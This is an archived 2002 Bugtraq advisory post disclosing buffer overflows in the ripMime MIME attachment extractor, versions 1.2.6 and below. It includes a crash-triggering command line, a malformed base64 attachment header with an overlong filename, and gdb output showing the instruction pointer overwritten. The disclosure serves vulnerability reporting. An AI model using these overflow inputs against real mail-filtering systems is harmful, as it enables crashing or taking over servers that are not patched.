[23966] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
pldaniels - ripMime 1.2.6 and lower?

daemon@ATHENA.MIT.EDU (KF)
Wed Jan 23 18:22:04 2002

Message-ID: <3C4DCC8C.6080403@snosoft.com>
Date: Tue, 22 Jan 2002 15:33:16 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Content-Type: multipart/mixed;
 boundary="------------070107090806050208080406"

--------------070107090806050208080406
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------070107090806050208080406
Content-Type: text/plain;
 name="ripmime-overflow.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline;
 filename="ripmime-overflow.txt"

ripMime mail filter remote / local overflows. At least version 1.2.6=20
vendor: http://www.pldaniels.com/ripmime/
Details:
CHANGELOG - 15/11/2001 - 20H57 - v1.2.7 Corrected buffer overflow problem=
s with exceptionally long file names. Corrected filename
length problems with OS level fread/write calls.

FreeBSD/ports/mail/ripmime/pkg-descr=20
 The FreeBSD Ports Collection ("mail/ripmime")
 You are now in the directory for the port "mail/ripmime" (package name "=
ripmime-1.2.4").
 This is the one-line description for this port:
 Extracts attached files out of a MIME encoded email package

Based on the above info ripmime is part of the FreeBSD ports collection a=
s far as I can tell...
I am not totally sure what it is used for becasue its poster application =
is Commercial and I=20
do not have a copy of the software "XaMime". I do know however that someh=
ow it interfaces with=20
sendmail to strip attachments or filter their content. I have been able t=
o cause a core dump via=20
2 methods one requires no user intervention and can be done remotely, how=
ever it does not yeild=20
an overwrite of the eip. The second method which I explain below could ye=
ild a shell under some=20
circumstances perhaps locally, again I do not know what the full potentia=
l use of ripmime is.

One possible use is in the above mentioned Commercial application located=
 at:
XaMime | Examine your e-mails
XaMime Mail and Virusfilter
URL: http://www.xamime.de/ or  http://www.xamime.com
It is some sort of commercial solution for email filtering.=20

ripMime also comes as part of the inflex package used for filtering virii=
 from attachments etc on unix boxen.
http://www.spyda.co.za/inflex/mainpage.html or http://www.pldaniels.com/i=
nflex/

Here is an example of the issues at hand
=2E/ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_=20
for BASE64 decoding.Segmentation fault

We are using a standard mail file with an incorrect header particularly t=
he  BASE64 filename
Content-Type: application/octet-stream;
 name=3D"blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename=3DAAAAAAAAAAAAAAAAAAA....<2000 total chars>


lets look at this more indepth using gdb.
(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'prin=
t "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAA_=20
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()

one more A and we have full eip overwrite. 2079 chars total overwrites th=
e eip

we smashed alot of stuff on the way.=20

r0             0x4141415f       1094795615  =20
r19            0x41414141       1094795585
r20            0x41414141       1094795585
r21            0x41414141       1094795585
r22            0x41414141       1094795585
r23            0x41414141       1094795585
r24            0x41414141       1094795585
r25            0x41414141       1094795585
r26            0x41414141       1094795585
r27            0x41414141       1094795585
r28            0x41414141       1094795585
r29            0x41414141       1094795585
r30            0x41414141       1094795585
r31            0x41414141       1094795585
pc             0x4141415c       1094795612
lr             0x4141415f       1094795615  =20

I need to investigate methods of changing defaultdir besides the commandl=
ine -d option to take advantage of this one.=20
But of course there are also several other overflows to play with. Once I=
 perfect the remote stuff I will mail out=20
another update. I just didn't want to get caught sleeping again like I di=
d on namazu.cgi. Oh yeah this is NOT=20
limited to BASE64 encoded files... have fun.=20

-KF

--------------070107090806050208080406--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[23966] in bugtraq

pldaniels - ripMime 1.2.6 and lower?

daemon@ATHENA.MIT.EDU (KF)Wed Jan 23 18:22:04 2002

daemon@ATHENA.MIT.EDU (KF)
Wed Jan 23 18:22:04 2002
